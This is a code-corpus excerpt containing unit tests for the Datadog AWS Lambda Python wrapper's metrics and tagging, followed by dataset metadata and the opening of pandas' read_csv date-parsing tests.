self.mock_threadstats_flush_distributions.assert_has_calls(
[
call(
[
{
"metric": "test.metric",
"points": [[ANY, [100]]],
"type": "distribution",
"host": None,
"device": None,
"tags": ANY,
"interval": 10,
}
]
)
]
)
self.mock_extract_dd_trace_context.assert_called_with(
lambda_event, lambda_context, extractor=None
)
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
self.mock_patch_all.assert_called()
def test_datadog_lambda_wrapper_flush_to_log(self):
os.environ["DD_FLUSH_TO_LOG"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_threadstats_flush_distributions.assert_not_called()
del os.environ["DD_FLUSH_TO_LOG"]
def test_datadog_lambda_wrapper_flush_in_thread(self):
# force ThreadStats to flush in thread
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(True)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
# assert flushing in the thread
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
# assert another flushing in the end
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)
# reset ThreadStats
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_not_flush_in_thread(self):
# force ThreadStats to not flush in thread
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
# assert no flushing in the thread
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
# assert flushing in the end
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
# reset ThreadStats
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_inject_correlation_ids(self):
os.environ["DD_LOGS_INJECTION"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
del os.environ["DD_LOGS_INJECTION"]
def test_invocations_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_errors_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.errors",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_cold_start_tag(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_is_cold_start.return_value = False
lambda_handler(
lambda_event, get_mock_context(aws_request_id="second-request-id")
)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:false",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_latest(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_context.invoked_function_arn = (
"arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
)
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:Latest",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_enhanced_metrics_alias(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
# tests wouldn't run because line was too long
alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
lambda_context.invoked_function_arn = alias_arn
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"executedversion:1",
"resource:python-layer-test:My_alias-1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_no_enhanced_metrics_without_env_var(self):
os.environ["DD_ENHANCED_METRICS"] = "false"
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_not_called()
del os.environ["DD_ENHANCED_METRICS"]
def test_only_one_wrapper_in_use(self):
patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
self.mock_submit_invocations_metric = patcher.start()
self.addCleanup(patcher.stop)
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
# Turn off _force_wrap to emulate the nested wrapper scenario,
# the second @datadog_lambda_wrapper should actually be no-op.
datadog_lambda_wrapper._force_wrap = False
lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)
lambda_event = {}
lambda_handler_double_wrapped(lambda_event, get_mock_context())
self.mock_patch_all.assert_called_once()
self.mock_submit_invocations_metric.assert_called_once()
| 35.954338
| 97
| 0.573025
|
import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
aws_request_id="request-id-1",
memory_limit_in_mb="256",
invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
function_version="1",
client_context={},
):
lambda_context = MagicMock()
lambda_context.aws_request_id = aws_request_id
lambda_context.memory_limit_in_mb = memory_limit_in_mb
lambda_context.invoked_function_arn = invoked_function_arn
lambda_context.function_version = function_version
lambda_context.client_context = client_context
return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
def setUp(self):
datadog_lambda_wrapper._force_wrap = True
patcher = patch(
"datadog.threadstats.reporters.HttpReporter.flush_distributions"
)
self.mock_threadstats_flush_distributions = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
self.mock_extract_dd_trace_context = patcher.start()
self.mock_extract_dd_trace_context.return_value = ({}, None)
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
self.mock_set_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
self.mock_inject_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.patch_all")
self.mock_patch_all = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.cold_start.is_cold_start")
self.mock_is_cold_start = patcher.start()
self.mock_is_cold_start.return_value = True
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.python_version_tuple")
self.mock_python_version_tuple = patcher.start()
self.mock_python_version_tuple.return_value = ("2", "7", "10")
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
self.mock_write_metric_point_to_stdout = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.get_library_version_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
self.mock_format_dd_lambda_layer_tag.return_value = "datadog_lambda:v6.6.6"
patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = (
"dd_lambda_layer:datadog-python27_0.1.0"
)
self.addCleanup(patcher.stop)
def test_datadog_lambda_wrapper(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_handler(lambda_event, lambda_context)
self.mock_threadstats_flush_distributions.assert_has_calls(
[
call(
[
{
"metric": "test.metric",
"points": [[ANY, [100]]],
"type": "distribution",
"host": None,
"device": None,
"tags": ANY,
"interval": 10,
}
]
)
]
)
self.mock_extract_dd_trace_context.assert_called_with(
lambda_event, lambda_context, extractor=None
)
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
self.mock_patch_all.assert_called()
def test_datadog_lambda_wrapper_flush_to_log(self):
os.environ["DD_FLUSH_TO_LOG"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_threadstats_flush_distributions.assert_not_called()
del os.environ["DD_FLUSH_TO_LOG"]
def test_datadog_lambda_wrapper_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(True)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_not_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_inject_correlation_ids(self):
os.environ["DD_LOGS_INJECTION"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
del os.environ["DD_LOGS_INJECTION"]
def test_invocations_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_errors_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.errors",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_cold_start_tag(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_is_cold_start.return_value = False
lambda_handler(
lambda_event, get_mock_context(aws_request_id="second-request-id")
)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:false",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_latest(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_context.invoked_function_arn = (
"arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
)
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:Latest",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_enhanced_metrics_alias(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
lambda_context.invoked_function_arn = alias_arn
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"executedversion:1",
"resource:python-layer-test:My_alias-1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_no_enhanced_metrics_without_env_var(self):
os.environ["DD_ENHANCED_METRICS"] = "false"
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_not_called()
del os.environ["DD_ENHANCED_METRICS"]
def test_only_one_wrapper_in_use(self):
patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
self.mock_submit_invocations_metric = patcher.start()
self.addCleanup(patcher.stop)
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
# Turn off _force_wrap to emulate the nested wrapper scenario,
# the second @datadog_lambda_wrapper should actually be no-op.
datadog_lambda_wrapper._force_wrap = False
lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)
lambda_event = {}
lambda_handler_double_wrapped(lambda_event, get_mock_context())
self.mock_patch_all.assert_called_once()
self.mock_submit_invocations_metric.assert_called_once()
| true
| true
|
f719035a10609454242fe84d548ee0290b6fb04e
| 34,201
|
py
|
Python
|
pandas/tests/io/parser/test_parse_dates.py
|
sayanmondal2098/pandas
|
2f6b90aaaab6814c102eb160c5a9c11bc04a092e
|
[
"BSD-3-Clause"
] | 1
|
2019-05-19T13:44:03.000Z
|
2019-05-19T13:44:03.000Z
|
pandas/tests/io/parser/test_parse_dates.py
|
sanjusci/pandas
|
a1fee9199eba7ebf423880243936b9f1501d3d3a
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/tests/io/parser/test_parse_dates.py
|
sanjusci/pandas
|
a1fee9199eba7ebf423880243936b9f1501d3d3a
|
[
"BSD-3-Clause"
] | 3
|
2018-01-08T08:40:55.000Z
|
2019-10-07T02:02:40.000Z
|
# -*- coding: utf-8 -*-
"""
Tests date parsing functionality for all of the
parsers defined in parsers.py
"""
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
    # Regression test for gh-4678: a thousands separator that also appears
    # inside the raw date text must not break merged-column date parsing.
    parser = all_parsers
    raw = "06-02-2013;13:00;1-000.215"

    result = parser.read_csv(StringIO(raw), sep=";", thousands="-",
                             parse_dates={"Date": [0, 1]}, header=None)

    expected = DataFrame([[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
                         columns=["Date", 2])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
def date_parser(*date_cols):
"""
Test date parser.
Parameters
----------
date_cols : args
The list of data columns to parse.
Returns
-------
parsed : Series
"""
return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))
result = parser.read_csv(StringIO(data), header=None,
date_parser=date_parser, prefix="X",
parse_dates={"actual": [1, 2],
"nominal": [1, 3]},
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["actual", "nominal", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
    """Nested lists in ``parse_dates`` merge the named columns into new
    "X1_X2"-style datetime columns; ``keep_date_col`` controls whether the
    raw source columns are retained."""
    data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None,
                             prefix="X", parse_dates=[[1, 2], [1, 3]],
                             keep_date_col=keep_date_col)
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", "19990127", " 19:00:00", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", "19990127", " 20:00:00", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", "19990127", " 21:00:00", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", "19990127", " 21:00:00", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", "19990127", " 22:00:00", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", "19990127", " 23:00:00", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
                "X3", "X4", "X5", "X6", "X7", "X8"])
    if not keep_date_col:
        # Source columns X1-X3 are consumed by the merge and dropped.
        expected = expected.drop(["X1", "X2", "X3"], axis=1)
    elif parser.engine == "python":
        # The Python engine keeps the raw date column as int64, not str.
        expected["X1"] = expected["X1"].astype(np.int64)
    tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
    """A parsed date column can simultaneously act as the index column."""
    data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None, prefix="X",
                             parse_dates=[1], index_col=1)
    # Column 1 ("X1") becomes the parsed index and disappears from the data.
    index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
                   datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
                   datetime(1999, 1, 27, 22, 0)], name="X1")
    expected = DataFrame([
        ["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
        ["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
        ["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
        ["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
        ["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
    ], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
    """Merged date columns parse correctly even though the raw date field
    ("19990127") is integer-like and passes through ``parse_date_time``."""
    data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
            "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
            "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
            "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
            "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
            "KORD,19990127, 23:00:00, 22:56:00, -0.5900")
    parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None,
                             date_parser=conv.parse_date_time,
                             parse_dates=parse_dates, prefix="X")
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", 0.81],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", 0.01],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", -0.99],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", -0.59],
    ], columns=["actual", "nominal", "X0", "X4"])
    # Python can sometimes be flaky about how
    # the aggregated columns are entered, so
    # this standardizes the order.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
    """``Timestamp`` itself can serve as the ``date_parser`` callable for a
    merged pair of date/time columns."""
    parser = all_parsers
    data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""
    result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
                             header=None, date_parser=Timestamp)
    # Both rows share the same combined timestamp; only column 3 differs.
    stamp = Timestamp("05/31/2012, 15:30:00.029")
    rows = [[stamp, 1306.25, size, "E", 0, np.nan, 1306.25]
            for size in (1, 8)]
    expected = DataFrame(rows, columns=["0_1", 2, 3, 4, 5, 6, 7])
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
    """With a header row, a ``parse_dates`` dict names the merged datetime
    column ("nominal") and places it first in the result."""
    parser = all_parsers
    data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
    result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
